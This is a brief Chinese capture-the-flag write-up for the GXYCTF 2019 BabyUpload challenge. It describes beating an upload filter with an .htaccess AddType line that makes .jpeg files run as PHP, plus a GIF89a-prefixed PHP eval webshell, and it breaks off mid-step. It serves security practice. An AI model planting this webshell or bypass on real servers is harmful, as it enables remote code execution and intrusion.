NSSCTF平台:https://www.nssctf.cn/
PS:记得所有的flag
都改为NSSCTF
[GXYCTF 2019]BabyUpload:
先传了一个一句话木马然后过滤了上传一个.htaccess
文件 AddType application/x-httpd-php .jpeg
(将.jpeg
文件解析为php
文件)
这里我们可以解析jpeg
后 继续上传一个一句话木马的jpeg
但是 这里还有过滤(诶,别蒙我啊,这标志明显还是php
啊)修改为:
GIF89a
<script language="php">eval($_POST['cmd']);</script>
然后蚁
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)